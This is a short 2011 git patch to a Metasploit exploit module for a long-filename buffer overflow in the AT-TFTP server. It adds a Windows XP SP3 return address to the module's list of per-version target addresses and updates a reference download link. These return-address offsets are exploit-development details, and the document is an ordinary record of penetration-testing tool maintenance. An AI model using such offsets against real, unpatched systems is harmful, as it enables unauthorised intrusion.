From e2820918adafc187dde1e7c514c4f2edccd4ba77 Mon Sep 17 00:00:00 2001 From: David Rude Date: Mon, 6 Jun 2011 20:29:02 +0000 Subject: [PATCH] adds Windows XP SP3 target and updates the reference link git-svn-id: file:///home/svn/framework3/trunk@12873 4d416f70-5f16-0410-b530-b9f4589650da --- modules/exploits/windows/tftp/attftp_long_filename.rb | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/modules/exploits/windows/tftp/attftp_long_filename.rb b/modules/exploits/windows/tftp/attftp_long_filename.rb index bf8004dd72..c2d736ebd1 100644 --- a/modules/exploits/windows/tftp/attftp_long_filename.rb +++ b/modules/exploits/windows/tftp/attftp_long_filename.rb @@ -31,7 +31,7 @@ class Metasploit3 < Msf::Exploit::Remote ['OSVDB', '11350'], ['BID', '21320'], ['URL','http://milw0rm.com/exploits/2887'], - ['URL', 'ftp://guest:guest@ftp.alliedtelesyn.co.uk/pub/utilities/at-tftpd.exe'], + ['URL', 'ftp://guest:guest@ftp.alliedtelesyn.co.uk/pub/utilities/at-tftpd19.zip'], ], 'DefaultOptions' => { @@ -55,6 +55,7 @@ class Metasploit3 < Msf::Exploit::Remote [ 'Windows 2000 SP4 English', { 'Ret' => 0x75031dce } ], [ 'Windows XP SP0/1 English', { 'Ret' => 0x71ab7bfb } ], [ 'Windows XP SP2 English', { 'Ret' => 0x71ab9372 } ], + [ 'Windows XP SP3 English', { 'Ret' => 0x7e429353 } ], # ret by c0re [ 'Windows Server 2003', { 'Ret' => 0x7c86fed3 } ], # ret donated by securityxxxpert [ 'Windows Server 2003 SP2', { 'Ret' => 0x7c86a01b } ], # ret donated by Polar Bear ],